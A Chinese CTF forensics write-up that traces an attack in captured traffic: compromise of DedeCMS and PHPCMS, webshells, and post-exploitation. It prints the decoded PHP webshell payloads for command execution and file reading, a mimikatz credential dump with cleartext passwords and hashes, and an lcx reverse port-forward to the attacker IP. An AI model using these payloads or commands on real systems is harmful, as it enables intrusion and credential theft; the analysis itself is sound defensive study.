[信息安全铁人三项赛总决赛](数据赛)第四题


WriteUps

信息安全铁人三项赛总决赛总结(企业赛)
信息安全铁人三项赛总决赛(数据赛)第二题
信息安全铁人三项赛总决赛(数据赛)第三题
信息安全铁人三项赛总决赛(数据赛)第四题


所有题目 : https://github.com/WangYihang/t3sec-network-flow-analysis/blob/master/2016-2017/%E5%86%B3%E8%B5%9B/N-EM-00004.md


[信息安全铁人三项赛总决赛](数据赛)第四题_第1张图片
image.png

有人在进行目录扫描
基本上可以确定 , 一个潜在的攻击者 , 以及被攻击者

攻击者 : 172.16.10.110
被攻击者 : 192.168.20.117

首先过滤出这两者之间的所有数据包

PS :
感觉还是在发现攻击者和被攻击者之后直接提取出他们之间的所有数据包比较靠谱

#!/bin/bash
#attack_dump.sh

target_folder='attack'

mkdir ${target_folder}

for file in `ls *.pcap`;
do
   echo "Dumping attack package in ${file}..."
   tcpdump -A -s 0 'host 172.16.10.110 or host 192.168.20.117' -r $file -w ${target_folder}/${file}
   echo "${file} Done!"
done

同时也生成了 http 的数据包
还是感觉直接搜索 http 的文本来的比较快

首先直接 grep 看看有没有小马什么的

888849-Connection: Keep-Alive
888850-Content-Type: text/plain
888851-
888852:
888853-17:54:03.133536 IP 172.16.10.110.8888 > 192.168.20.117.1409: Flags [P.], seq 1927878527:1927879124, ack 2736838709, win 64240, length 597
888854-E..}.k@...St..
888855-n...u"...r.... .5P.......POST //index.php?m=member&c=index&a=register&siteid=1 HTTP/1.1

不过居然是个文本文件 ?

[信息安全铁人三项赛总决赛](数据赛)第四题_第2张图片
image.png

再往上下翻翻居然发现了一个小马

[信息安全铁人三项赛总决赛](数据赛)第四题_第3张图片
image.png

这里的小马好像有一些特征 :
比如说 :

User-Agent: Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)
array_map

根据这个特性进行搜索

grep -n -C 5 'spider.html' http.txt | grep 'POST '

果然发现了两个小马 :

/9.php
/uploadfile/2017/0905/20170905055411283.php
image.png

猜想这两个小马可能是通过漏洞写入的
直接搜索 9.php 最开始出现的地方

[信息安全铁人三项赛总决赛](数据赛)第四题_第4张图片
image.png

[信息安全铁人三项赛总决赛](数据赛)第四题_第5张图片
image.png

搜索一下 /admin/file_manage_control.php
发现是织梦CMS
利用的漏洞应该是 :

http://www.cnblogs.com/LittleHann/p/4237578.html

可以看到首先攻击者利用了上述漏洞 9.php 写入服务器

[信息安全铁人三项赛总决赛](数据赛)第四题_第6张图片
image.png

而搜索另一个小马的时候却发现是直接就进行了利用
而且文件名是以时间的形式命名
猜想是利用了文件上传漏洞将文件上传到服务器的

根据数据包详情 , 找到了如下一篇文章 :

http://0day5.com/archives/4368/ (phpcms v9 前台 GetShell)
这个漏洞在利用的过程中用到了 1.txt

继续向前回溯

找到攻击者是通过 9.php 写入了 1.txt 这个文件

[信息安全铁人三项赛总决赛](数据赛)第四题_第7张图片
image.png
[信息安全铁人三项赛总决赛](数据赛)第四题_第8张图片
image.png

继续向前分析 , 攻击者在触发 DedeCMS 写入 9.php 的时候需要得到管理员的密码
那么在这之前肯定对密码进行了爆破

grep -n 'POST ' http.txt | awk -F 'POST ' '{print $2}' | awk -F 'HTTP/1.1' '{print $1}' | sort | uniq -c
[信息安全铁人三项赛总决赛](数据赛)第四题_第9张图片
image.png

经过寻找发现 , 攻击者几乎是已经知道了登录后台的密码 , 并没有经过爆破 , 而是直接登录


[信息安全铁人三项赛总决赛](数据赛)第四题_第10张图片
image.png
gotopage=%2Fadmin%2F&dopost=login&adminstyle=newdedecms&userid=admin&pwd=19901109&validate=yyer&sm1=%B5%C7%C2%BC
gotopage=/admin/&dopost=login&adminstyle=newdedecms&userid=admin&pwd=19901109&validate=yyer&sm1=

用户名为 : admin
密码为 : 19901109

让攻击者直接知道密码就登录
可能性有很多
有可能是攻击者直接通过注入得到了管理员密码
也有可能是通过社工
也可能是敏感信息泄露等等

经过研究发现应该不会是明注得到的管理员密码
因为在流量包中不能检索到别的相同的字符串

image.png

尝试检测是否存在盲注的情况
...可能因为能力有限 , 并没有分析出来...

接下来可以看看攻击者都使用两个小马做了什么
首先看 9.php

grep -n -C 32 'POST /9.php' http.txt | grep array_map | sed 's/%3D/\=/g' | sed 's/%2F/\//g' | sed 's/%2B/\+/g'
grep -n -C 32 'POST /9.php' http.txt | grep array_map | sed 's/%3D/\=/g' | sed 's/%2F/\//g' | sed 's/%2B/\+/g' | grep -E 'xx\(.+' -o | sed 's/^xx//g' | tr -d '()";\\\' | tr -d "'"
@ini_set("display_errors","0");@set_time_limit(0);if(PHP_VERSION<'5.3.0'){@set_magic_quotes_runtime(0);};echo("X@Y");$D=dirname(__FILE__);$R="{$D}\t";if(substr($D,0,1)!="/"){foreach(range("A","Z") as $L)if(is_dir("{$L}:"))$R.="{$L}:";}$R.="\t";$u=(function_exists('posix_getegid'))?@posix_getpwuid(@posix_geteuid()):'';$usr=($u)?$u['name']:@get_current_user();$R.=php_uname();$R.="({$usr})";print $R;;echo("X@Y");die();
// 获取系统版本以及用户名等信息
C:\phpStudy\WWW  C:  Windows NT WANGGUAN-C938A1 5.2 build 3790 (Windows Server 2003 Enterprise x64 Edition Service Pack 2) i586(Administrator)

@ini_set("display_errors","0");@set_time_limit(0);if(PHP_VERSION<'5.3.0'){@set_magic_quotes_runtime(0);};echo("X@Y");$D='C:\\phpStudy\\WWW\\';$F=@opendir($D);if($F==NULL){echo("ERROR:// Path Not Found Or No Permission!");}else{$M=NULL;$L=NULL;while($N=@readdir($F)){$P=$D.'/'.$N;$T=@date("Y-m-d H:i:s",@filemtime($P));@$E=substr(base_convert(@fileperms($P),10,8),-4);$R="\t".$T."\t".@filesize($P)."\t".$E."\n";if(@is_dir($P))$M.=$N."/".$R;else $L.=$N.$R;}echo $M.$L;@closedir($F);};echo("X@Y");die();
// 读取 C:\\phpStudy\\WWW\\ 目录下的所有文件
./   2017-09-05 17:34:52 0   0777
../ 2017-08-29 11:16:35 0   0777
a/  2017-09-05 16:05:51 0   0777
admin/  2017-09-05 16:05:51 0   0777
data/   2017-09-05 16:18:01 0   0777
images/ 2017-09-05 16:03:30 0   0777
include/    2017-09-05 16:03:21 0   0777
install/    2017-09-05 16:06:08 0   0777
member/ 2017-09-05 16:03:24 0   0777
phpMyAdmin/ 2017-08-29 11:16:15 0   0777
plus/   2017-09-05 16:05:51 0   0777
special/    2017-09-05 16:05:51 0   0777
templets/   2017-09-05 16:03:26 0   0777
uploads/    2017-09-05 16:05:51 0   0777
9.php   2017-09-05 17:34:52 26  0666
favicon.ico 2010-03-11 15:45:00 1150    0666
index.php   2010-02-07 17:05:00 738 0666
robots.txt  2010-02-07 17:05:00 505 0666
tags.php    2010-02-07 17:05:00 633 0666
wap.php 2010-02-07 17:05:00 3938    0666

@ini_set("display_errors","0");@set_time_limit(0);if(PHP_VERSION<'5.3.0'){@set_magic_quotes_runtime(0);};echo("X@Y");$D='C:\\phpStudy\\WWW\\';$F=@opendir($D);if($F==NULL){echo("ERROR:// Path Not Found Or No Permission!");}else{$M=NULL;$L=NULL;while($N=@readdir($F)){$P=$D.'/'.$N;$T=@date("Y-m-d H:i:s",@filemtime($P));@$E=substr(base_convert(@fileperms($P),10,8),-4);$R="\t".$T."\t".@filesize($P)."\t".$E."\n";if(@is_dir($P))$M.=$N."/".$R;else $L.=$N.$R;}echo $M.$L;@closedir($F);};echo("X@Y");die();
// 读取 C:\\phpStudy\\WWW\\ 目录下的所有文件

@ini_set("display_errors","0");@set_time_limit(0);if(PHP_VERSION<'5.3.0'){@set_magic_quotes_runtime(0);};echo("X@Y");$D=dirname(__FILE__);$R="{$D}\t";if(substr($D,0,1)!="/"){foreach(range("A","Z") as $L)if(is_dir("{$L}:"))$R.="{$L}:";}$R.="\t";$u=(function_exists('posix_getegid'))?@posix_getpwuid(@posix_geteuid()):'';$usr=($u)?$u['name']:@get_current_user();$R.=php_uname();$R.="({$usr})";print $R;;echo("X@Y");die();
// 获取系统版本以及用户名等信息

@ini_set("display_errors","0");@set_time_limit(0);if(PHP_VERSION<'5.3.0'){@set_magic_quotes_runtime(0);};echo("X@Y");$m=get_magic_quotes_gpc();$p='cmd';$s='cd /d C:\\phpStudy\\WWW\\&whoami&echo [S]&cd&echo [E]';$d=dirname($_SERVER["SCRIPT_FILENAME"]);$c=substr($d,0,1)=="/"?"-c \"{$s}\"":"/c \"{$s}\"";$r="{$p} {$c}";$array=array(array("pipe","r"),array("pipe","w"),array("pipe","w"));$fp=proc_open($r." 2>&1",$array,$pipes);$ret=stream_get_contents($pipes[1]);proc_close($fp);print $ret;;echo("X@Y");die();
// 执行系统命令 whoami
wangguan-c938a1\administrator

@ini_set("display_errors","0");@set_time_limit(0);if(PHP_VERSION<'5.3.0'){@set_magic_quotes_runtime(0);};echo("X@Y");$m=get_magic_quotes_gpc();$p='cmd';$s='cd /d C:\\phpStudy\\WWW\\&ipconfig&echo [S]&cd&echo [E]';$d=dirname($_SERVER["SCRIPT_FILENAME"]);$c=substr($d,0,1)=="/"?"-c \"{$s}\"":"/c \"{$s}\"";$r="{$p} {$c}";$array=array(array("pipe","r"),array("pipe","w"),array("pipe","w"));$fp=proc_open($r." 2>&1",$array,$pipes);$ret=stream_get_contents($pipes[1]);proc_close($fp);print $ret;;echo("X@Y");die();
// 执行系统命令 ipconfig
Windows IP Configuration.               
.                    
.                    
Ethernet adapter ........:.             
.                    
   Connection-specific DNS Suffix  . : .           
   IP Address. . . . . . . . . . . . : 192.168.20.117.
   Subnet Mask . . . . . . . . . . . : 255.255.255.0.
   Default Gateway . . . . . . . . . : 192.168.20.1.

@ini_set("display_errors","0");@set_time_limit(0);if(PHP_VERSION<'5.3.0'){@set_magic_quotes_runtime(0);};echo("X@Y");$m=get_magic_quotes_gpc();$p='cmd';$s='cd /d C:\\phpStudy\\WWW\\&systeminfo&echo [S]&cd&echo [E]';$d=dirname($_SERVER["SCRIPT_FILENAME"]);$c=substr($d,0,1)=="/"?"-c \"{$s}\"":"/c \"{$s}\"";$r="{$p} {$c}";$array=array(array("pipe","r"),array("pipe","w"),array("pipe","w"));$fp=proc_open($r." 2>&1",$array,$pipes);$ret=stream_get_contents($pipes[1]);proc_close($fp);print $ret;;echo("X@Y");die();
// 执行系统命令 systeminfo
......:           WANGGUAN-C938A1
OS ....:          Microsoft(R) Windows(R) Server 2003 Enterprise x64 Edition
OS ....:          5.2.3790 Service Pack 2 Build 3790
OS ......:        Microsoft Corporation
OS ....:          ..........
OS ........:      Uniprocessor Free
............:     wangguan
..........:               
.... ID:          91353-645-7659413-50864
............:     2017-8-29, 10:14:19
............:     0 .. 2 .... 55 .. 11 ..
..........:       VMware, Inc.
........:         VMware Virtual Platform
........:         x64-based PC
......:           ...... 1 ..........
                  [01]: EM64T Family 6 Model 60 Stepping 3 GenuineIntel ~3400 Mhz
BIOS ....:        UNKNOWN 
Windows ....:     C:\WINDOWS
........:         C:\WINDOWS\system32
........:         \Device\HarddiskVolume1
............:     zh-cn;....(....)
..............:   zh-cn;....(....)
....:             (GMT+08:00) ....................................
............:     1,023 MB
..............:   379 MB  
........: ......: 2,299 MB
........: ....:   1,854 MB
........: ......: 445 MB  
............:     C:\pagefile.sys
..:               WORKGROUP
..........:       \\WANGGUAN-C938A1
........:         ...... 1 ............
                  [       
17:35:41.557144 IP 192.168.20.117.http > 172.16.10.110.5299: Flags [P.], seq 2606:2963, ack 4254, win 64240, length 357: HTTP
E...TG@........u..        
n.P......5..QP...."..01]: Q147222
....:             ...... 1 .. NIC..
                  [01]: Intel(R) PRO/1000 MT Network Connection
                      ......:      ........
                      .... DHCP:   ..                                                                                          
                      DHCP ......: 192.168.20.1
                      IP ....
                      [01]: 192.168.20.117
[S]                       

@ini_set("display_errors","0");@set_time_limit(0);if(PHP_VERSION<'5.3.0'){@set_magic_quotes_runtime(0);};echo("X@Y");$f='C:\\phpStudy\\WWW\\mimikatz.exe';$c=$_POST["z1"];$c=str_replace("\r","",$c);$c=str_replace("\n","",$c);$buf="";for($i=0;$i> C:\\phpStudy\\WWW\\log.txt&echo [S]&cd&echo [E]';$d=dirname($_SERVER["SCRIPT_FILENAME"]);$c=substr($d,0,1)=="/"?"-c \"{$s}\"":"/c \"{$s}\"";$r="{$p} {$c}";$array=array(array("pipe","r"),array("pipe","w"),array("pipe","w"));$fp=proc_open($r." 2>&1",$array,$pipes);$ret=stream_get_contents($pipes[1]);proc_close($fp);print $ret;;echo("X@Y");die();
// 执行系统命令 : C:\\phpStudy\\WWW\\&mimikatz.exe ""privilege::debug"" ""sekurlsa::logonpasswords"" exit >> C:\\phpStudy\\WWW\\log.txt
// 使用 mimikatz.exe 搜集系统密码并输出到 C:\\phpStudy\\WWW\\log.txt 中

@ini_set("display_errors","0");@set_time_limit(0);if(PHP_VERSION<'5.3.0'){@set_magic_quotes_runtime(0);};echo("X@Y");$D='C:\\phpStudy\\WWW\\';$F=@opendir($D);if($F==NULL){echo("ERROR:// Path Not Found Or No Permission!");}else{$M=NULL;$L=NULL;while($N=@readdir($F)){$P=$D.'/'.$N;$T=@date("Y-m-d H:i:s",@filemtime($P));@$E=substr(base_convert(@fileperms($P),10,8),-4);$R="\t".$T."\t".@filesize($P)."\t".$E."\n";if(@is_dir($P))$M.=$N."/".$R;else $L.=$N.$R;}echo $M.$L;@closedir($F);};echo("X@Y");die();
// 读取 C:\\phpStudy\\WWW\\ 目录下的所有文件

@ini_set("display_errors","0");@set_time_limit(0);if(PHP_VERSION<'5.3.0'){@set_magic_quotes_runtime(0);};echo("X@Y");$F="C:\\phpStudy\\WWW\\log.txt";$fp=@fopen($F,'r');if(@fgetc($fp)){@fclose($fp);@readfile($F);}else{echo('ERROR:// Can Not Read');};echo("X@Y");die();
// 读取文件内容 : C:\\phpStudy\\WWW\\log.txt
  .#####.   mimikatz 2.1.1 (x64) built on Apr  9 2017 23:24:20
 .## ^ ##.  "A La Vie, A L'Amour"                   
 ## / \ ##  /* * *                                  
 ## \ / ##   Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
 '## v ##'   http://blog.gentilkiwi.com/mimikatz             (oe.eo)
  '#####'                                     with 21 modules * * */
                                                    
mimikatz(commandline) # privilege::debug            
Privilege '20' OK                                   
                                                    
mimikatz(commandline) # sekurlsa::logonpasswords    
                                                    
Authentication Id : 0 ; 996 (00000000:000003e4)     
Session           : Service from 0                  
User Name         : NETWORK SERVICE                 
Domain            : NT AUTHORITY                    
Logon Server      : (null)                          
Logon Time        : 2017-9-5 14:40:42               
SID               : S-1-5-20                        
    msv :                                           
     [00000002] Primary                             
     * Username : WANGGUAN-C938A1$                  
     * Domain   : WORKGROUP                         
     * LM       : aad3b435b51404eeaad3b435b51404ee  
     * NTLM     : 31d6cfe0d16ae931b73c59d7e0c089c0       
     * SHA1     : da39a3ee5e6b4b0d3255bfef95601890afd80709
    wdigest :                                       
     * Username : WANGGUAN-C938A1$                  
     * Domain   : WORKGROUP                         
     * Password : (null)                            
    kerberos :                                      
     * Username : wangguan-c938a1$                  
     * Domain   : WORKGROUP                         
     * Password : (null)                            
    ssp :                                           
    credman :                                       
                                                    
Authentication Id : 0 ; 216713 (00000000:00034e89)  
Session           : Interactive from 0              
Us                                                                                                                         
17:36:47.042287 IP 192.168.20.117.http > 172.16.10.110.5303: Flags [.], seq 1461:2921, ack 767, win 63473, length 1460: HTTP
E...V.@........u..                                  
n.P...#U....8P....n..er Name         : Administrator                                                                          
Domain            : WANGGUAN-C938A1                 
Logon Server      : WANGGUAN-C938A1                 
Logon Time        : 2017-9-5 14:41:24               
SID               : S-1-5-21-2640452580-1396535521-4086226850-500
    msv :                                           
     [00000002] Primary                             
     * Username : Administrator                     
     * Domain   : WANGGUAN-C938A1
     * LM       : 1160eb40860de5aeb75e0c8d76954a50
     * NTLM     : 74e0fa3bf5a67fd3b43ed8912042fabb       
     * SHA1     : 9d464a83db1089ff0b49c72938d2806953594714
    wdigest :      
     * Username : Administrator
     * Domain   : WANGGUAN-C938A1
     * Password : mtfly@123
    kerberos :     
     * Username : Administrator
     * Domain   : WANGGUAN-C938A1
     * Password : mtfly@123
    ssp :       
    credman :   
                
Authentication Id : 0 ; 997 (00000000:000003e5)
Session           : Service from 0
User Name         : LOCAL SERVICE
Domain            : NT AUTHORITY
Logon Server      : (null) 
Logon Time        : 2017-9-5 14:40:42
SID               : S-1-5-19
    msv :       
    wdigest :   
    kerberos :     
     * Username : (null)  
     * Domain   : (null)  
     * Password : (null)  
    ssp :       
    credman :   
                
Authentication Id : 0 ; 52147 (00000000:0000cbb3)
Session           : UndefinedLogonType from 0
User Name         : (null)
Domain            : (null)
Logon Server      : (null)          
Logon Time        : 2017-9-5 14:40:42
SID               : 
    msv :       
    wdigest :   
    kerberos :  
    ssp :       
    credman :                                                                    
                
Authentication Id : 0 ; 999 (00000000:000003e7)
Session           : UndefinedLogonType f


@ini_set("display_errors","0");@set_time_limit(0);if(PHP_VERSION<'5.3.0'){@set_magic_quotes_runtime(0);};echo("X@Y");$F='C:\\phpStudy\\WWW\\log.txt';$P=@fopen($F,'r');echo(@fread($P,filesize($F)));@fclose($P);;echo("X@Y");die();
// 读取文件内容 : C:\\phpStudy\\WWW\\log.txt

@ini_set("display_errors","0");@set_time_limit(0);if(PHP_VERSION<'5.3.0'){@set_magic_quotes_runtime(0);};echo("X@Y");$f='C:\\phpStudy\\WWW\\DTools.exe';$c=$_POST["z1"];$c=str_replace("\r","",$c);$c=str_replace("\n","",$c);$buf="";for($i=0;$i

@ini_set("display_errors","0");@set_time_limit(0);if(PHP_VERSION<'5.3.0'){@set_magic_quotes_runtime(0);};echo("X@Y");$f='C:\\phpStudy\\WWW\\data\\22.exe';$c=$_POST["z1"];$c=str_replace("\r","",$c);$c=str_replace("\n","",$c);$buf="";for($i=0;$i&1",$array,$pipes);$ret=stream_get_contents($pipes[1]);proc_close($fp);print $ret;;echo("X@Y");die();
// 执行系统命令 : C:\\phpStudy\\WWW\\22.exe

@ini_set("display_errors","0");@set_time_limit(0);if(PHP_VERSION<'5.3.0'){@set_magic_quotes_runtime(0);};echo("X@Y");$D='C:\\';$F=@opendir($D);if($F==NULL){echo("ERROR:// Path Not Found Or No Permission!");}else{$M=NULL;$L=NULL;while($N=@readdir($F)){$P=$D.'/'.$N;$T=@date("Y-m-d H:i:s",@filemtime($P));@$E=substr(base_convert(@fileperms($P),10,8),-4);$R="\t".$T."\t".@filesize($P)."\t".$E."\n";if(@is_dir($P))$M.=$N."/".$R;else $L.=$N.$R;}echo $M.$L;@closedir($F);};echo("X@Y");die();
// 读取 C:\\ 目录下的所有文件

@ini_set("display_errors","0");@set_time_limit(0);if(PHP_VERSION<'5.3.0'){@set_magic_quotes_runtime(0);};echo("X@Y");$m=get_magic_quotes_gpc();$p='cmd';$s='cd /d C:\\phpStudy\\WWW\\&C:\\phpStudy\\WWW\\data\\22.exe&echo [S]&cd&echo [E]';$d=dirname($_SERVER["SCRIPT_FILENAME"]);$c=substr($d,0,1)=="/"?"-c \"{$s}\"":"/c \"{$s}\"";$r="{$p} {$c}";$array=array(array("pipe","r"),array("pipe","w"),array("pipe","w"));$fp=proc_open($r." 2>&1",$array,$pipes);$ret=stream_get_contents($pipes[1]);proc_close($fp);print $ret;;echo("X@Y");die();
// 执行系统命令 : C:\\phpStudy\\WWW\\22.exe

@ini_set("display_errors","0");@set_time_limit(0);if(PHP_VERSION<'5.3.0'){@set_magic_quotes_runtime(0);};echo("X@Y");$f='C:\\Hscan������ɨ��.zip';$c=$_POST["z1"];$c=str_replace("\r","",$c);$c=str_replace("\n","",$c);$buf="";for($i=0;$i&1",$array,$pipes);$ret=stream_get_contents($pipes[1]);proc_close($fp);print $ret;;echo("X@Y");die();
// 执行系统命令 C:\\lcx.exe -slave 172.16.10.110 8888 192.168.20.88 80

@ini_set("display_errors","0");@set_time_limit(0);if(PHP_VERSION<'5.3.0'){@set_magic_quotes_runtime(0);};echo("X@Y");echo fwrite(fopen('C:\\phpStudy\\WWW\\1.txt','w'),$_POST['z1'])?'1':'0';;echo("X@Y");die();
// 写入文件 C:\\phpStudy\\WWW\\1.txt


@ini_set("display_errors","0");@set_time_limit(0);if(PHP_VERSION<'5.3.0'){@set_magic_quotes_runtime(0);};echo("X@Y");$D='C:\\phpStudy\\WWW\\';$F=@opendir($D);if($F==NULL){echo("ERROR:// Path Not Found Or No Permission!");}else{$M=NULL;$L=NULL;while($N=@readdir($F)){$P=$D.'/'.$N;$T=@date("Y-m-d H:i:s",@filemtime($P));@$E=substr(base_convert(@fileperms($P),10,8),-4);$R="\t".$T."\t".@filesize($P)."\t".$E."\n";if(@is_dir($P))$M.=$N."/".$R;else $L.=$N.$R;}echo $M.$L;@closedir($F);};echo("X@Y");die();
// 读取 C:\\phpStudy\\WWW\\ 目录下的所有文件

@ini_set("display_errors","0");@set_time_limit(0);if(PHP_VERSION<'5.3.0'){@set_magic_quotes_runtime(0);};echo("X@Y");$D='C:\\phpStudy\\WWW\\';$F=@opendir($D);if($F==NULL){echo("ERROR:// Path Not Found Or No Permission!");}else{$M=NULL;$L=NULL;while($N=@readdir($F)){$P=$D.'/'.$N;$T=@date("Y-m-d H:i:s",@filemtime($P));@$E=substr(base_convert(@fileperms($P),10,8),-4);$R="\t".$T."\t".@filesize($P)."\t".$E."\n";if(@is_dir($P))$M.=$N."/".$R;else $L.=$N.$R;}echo $M.$L;@closedir($F);};echo("X@Y");die();
// 读取 C:\\phpStudy\\WWW\\ 目录下的所有文件

然后再看另一个小马文件 :

grep -n -C 32 'POST /uploadfile/2017/0905/20170905055411283.php' http.txt | grep array_map | sed 's/%3D/\=/g' | sed 's/%2F/\//g' | sed 's/%2B/\+/g' | grep -E 'xx\(.+' -o | sed 's/^xx//g' > base64
http ›› ipython                                                                                                                                                                              
In [1]: with open("base64") as f:
   ...:     for line in f:
   ...:         print line[2:-12].decode("base64")
@ini_set("display_errors","0");@set_time_limit(0);if(PHP_VERSION<'5.3.0'){@set_magic_quotes_runtime(0);};echo("X@Y");$D='/var/www/html/include/crons/';$F=@opendir($D);if($F==NULL){echo("ERROR:// Path Not Found Or No Permission!");}else{$M=NULL;$L=NULL;while($N=@readdir($F)){$P=$D.'/'.$N;$T=@date("Y-m-d H:i:s",@filemtime($P));@$E=substr(base_convert(@fileperms($P),10,8),-4);$R="\t".$T."\t".@filesize($P)."\t".$E."\n";if(@is_dir($P))$M.=$N."/".$R;else $L.=$N.$R;}echo $M.$L;@closedir($F);};echo("X@Y");die();
// 读取目录 /var/www/html/include/crons/ 下的所有文件

@ini_set("display_errors","0");@set_time_limit(0);if(PHP_VERSION<'5.3.0'){@set_magic_quotes_runtime(0);};echo("X@Y");$D='/var/www/html/include/';$F=@opendir($D);if($F==NULL){echo("ERROR:// Path Not Found Or No Permission!");}else{$M=NULL;$L=NULL;while($N=@readdir($F)){$P=$D.'/'.$N;$T=@date("Y-m-d H:i:s",@filemtime($P));@$E=substr(base_convert(@fileperms($P),10,8),-4);$R="\t".$T."\t".@filesize($P)."\t".$E."\n";if(@is_dir($P))$M.=$N."/".$R;else $L.=$N.$R;}echo $M.$L;@closedir($F);};echo("X@Y");die();
// 读取目录 /var/www/html/include/ 下的所有文件

@ini_set("display_errors","0");@set_time_limit(0);if(PHP_VERSION<'5.3.0'){@set_magic_quotes_runtime(0);};echo("X@Y");$D='/var/www/html/include/';$F=@opendir($D);if($F==NULL){echo("ERROR:// Path Not Found Or No Permission!");}else{$M=NULL;$L=NULL;while($N=@readdir($F)){$P=$D.'/'.$N;$T=@date("Y-m-d H:i:s",@filemtime($P));@$E=substr(base_convert(@fileperms($P),10,8),-4);$R="\t".$T."\t".@filesize($P)."\t".$E."\n";if(@is_dir($P))$M.=$N."/".$R;else $L.=$N.$R;}echo $M.$L;@closedir($F);};echo("X@Y");die();
// 读取目录 /var/www/html/include/ 下的所有文件

@ini_set("display_errors","0");@set_time_limit(0);if(PHP_VERSION<'5.3.0'){@set_magic_quotes_runtime(0);};echo("X@Y");$D='/var/www/html/';$F=@opendir($D);if($F==NULL){echo("ERROR:// Path Not Found Or No Permission!");}else{$M=NULL;$L=NULL;while($N=@readdir($F)){$P=$D.'/'.$N;$T=@date("Y-m-d H:i:s",@filemtime($P));@$E=substr(base_convert(@fileperms($P),10,8),-4);$R="\t".$T."\t".@filesize($P)."\t".$E."\n";if(@is_dir($P))$M.=$N."/".$R;else $L.=$N.$R;}echo $M.$L;@closedir($F);};echo("X@Y");die();
// 读取目录 /var/www/html/ 下的所有文件
X@Yphpsso_server/   2017-09-03 03:31:30 4096    0777
api/    2017-09-03 03:31:44 4096    0777
statics/    2017-09-03 03:31:44 4096    0777
caches/ 2017-09-03 03:45:14 4096    0777
./  2017-09-03 03:38:34 4096    0777
html/   2017-09-03 03:37:50 4096    0777
phpcms/ 2017-09-03 03:31:27 4096    0777
../ 2017-09-03 03:30:49 4096    0755
uploadfile/ 2017-09-05 02:25:38 4096    0777
api.php 2017-09-03 03:31:44 989 0777
plugin.php  2017-09-03 03:31:44 3593    0777
favicon.ico 2017-09-03 03:31:44 3158    0777
js.html 2017-09-03 03:31:44 520 0777
crossdomain.xml 2017-09-03 03:31:44 104 0777
admin.php   2017-09-03 03:31:44 48  0777
robots.txt  2017-09-03 03:31:44 170 0777
index.php   2017-09-03 03:31:44 313 0777
index.html  2017-09-05 00:13:08 9578    0777

@ini_set("display_errors","0");@set_time_limit(0);if(PHP_VERSION<'5.3.0'){@set_magic_quotes_runtime(0);};echo("X@Y");$F='/var/www/html/api.php';$P=@fopen($F,'r');echo(@fread($P,filesize($F)));@fclose($P);;echo("X@Y");die();
// 读取文件 /var/www/html/api.php 内容
get_one(array('userid'=>$_userid),'islock');
    if($memberinfo['islock']) exit('

Bad Request!

'); } $op = isset($_GET['op']) && trim($_GET['op']) ? trim($_GET['op']) : exit('Operation can not be empty'); if (isset($_GET['callback']) && !preg_match('/^[a-zA-Z_][a-zA-Z0-9_]+$/', $_GET['callback'])) unset($_GET['callback']); if (!preg_match('/([^a-z_]+)/i',$op) && file_exists(PHPCMS_PATH.'api/'.$op.'.php')) { include PHPCMS_PATH.'api/'.$op.'.php'; } else { exit('API handler does not exist'); } ?> @ini_set("display_errors","0");@set_time_limit(0);if(PHP_VERSION<'5.3.0'){@set_magic_quotes_runtime(0);};echo("X@Y");$D='/var/www/html/phpcms/';$F=@opendir($D);if($F==NULL){echo("ERROR:// Path Not Found Or No Permission!");}else{$M=NULL;$L=NULL;while($N=@readdir($F)){$P=$D.'/'.$N;$T=@date("Y-m-d H:i:s",@filemtime($P));@$E=substr(base_convert(@fileperms($P),10,8),-4);$R="\t".$T."\t".@filesize($P)."\t".$E."\n";if(@is_dir($P))$M.=$N."/".$R;else $L.=$N.$R;}echo $M.$L;@closedir($F);};echo("X@Y");die(); // 读取目录 /var/www/html/phpcms/ 下的所有文件 model/ 2017-09-03 03:31:17 4096 0777 libs/ 2017-09-03 03:31:16 4096 0777 languages/ 2017-09-03 03:31:15 4096 0777 ./ 2017-09-03 03:31:27 4096 0777 plugin/ 2017-09-03 03:31:27 4096 0777 templates/ 2017-09-03 03:31:27 4096 0777 ../ 2017-09-03 03:38:34 4096 0777 modules/ 2017-09-03 03:31:27 4096 0777 base.php 2017-09-03 03:31:15 8462 0777 index.html 2017-09-03 03:31:15 1 0777 @ini_set("display_errors","0");@set_time_limit(0);if(PHP_VERSION<'5.3.0'){@set_magic_quotes_runtime(0);};echo("X@Y");$F='/var/www/html/phpcms/base.php';$P=@fopen($F,'r');echo(@fread($P,filesize($F)));@fclose($P);;echo("X@Y");die(); // 读取文件 /var/www/html/phpcms/base.php 内容 '/', //Session.... 'session_storage' => 'mysql', 'session_ttl' => 1800, 'session_savepath' => CACHE_PATH.'sessions/', 'session_n' => 0, //Cookie.... 'cookie_domain' => '', //Cookie ...... 'cookie_path' => '', //Cookie ........ 'cookie_pre' => 'LTBnY_', //Cookie ......................................Cookie.... 'cookie_ttl' => 0, //Cookie ..........0 ................ //............ 'tpl_root' => 'templates/', //................ 'tpl_name' => 'default', //................ 'tpl_css' => 'default', //............ 'tpl_referesh' => 1, 'tpl_edit'=> 0,//.................... //............ 'upload_path' => PHPCMS_PATH.'uploadfile/', 'upload_url' => 'http://192.168.20.88/uploadfile/', //........ 'attachment_stat' => '1',//.................... 0 .... 1 ...... ....: ...................... 'js_path' => 'http://192.168.20.88/statics/js/', //CDN JS 'css_path' => 'http://192.168.20.88/statics/css/', //CDN CSS 'img_path' => 'http://192.168.20.88/statics/images/', //CDN img 'app_path' => 'http://192.168.20.88/',//................ 'charset' => 'gbk', //.......... 'timezone' => 'Etc/GMT-8', //..............php 5.1................Etc/GMT-8 ............ GMT+8 'debug' => 0, //................ 'admin_log' => 17:57:02.163812 IP 192.168.20.117.1423 > 172.16.10.110.8888: Flags [P.], seq 1461:2610, ack 768, win 63472, length 1149 E....;@...Q|...u.. n..".-. 1, //1................ cache/error_log.php | 0................ 'gzip' => 1, //....Gzip.......... 'auth_key' => 'AivCd1tuXDZfzVOKBybL', //.... 'lang' => 'zh-cn', //.......... 'lock_ex' => '1', //........................................nfs.......... 'admin_founders' => '1', //..........ID......ID........ 'execution_sql' => 0, //EXECUTION_SQL 'execution_sql' => 0, //EXECUTION_SQL 'phpsso' => '1', //........phpsso 'phpsso_appid' => '1', //....id 'phpsso_api_url' => 'http://192.168.20.88/phpsso_server', //........ 'phpsso_auth_key' => 'AUch7BSWgtuikaORhVcUyOgkyY69Glwb', //........ 'phpsso_version' => '1', //phpsso.... 'html_root' => '/html',//................ 'safe_card'=>'1',//.............. 'connect_enable' => '1', //.................. 'sina_akey' => '', //sina AKEY 'sina_skey' => '', //sina SKEY 'snda_akey' => '', 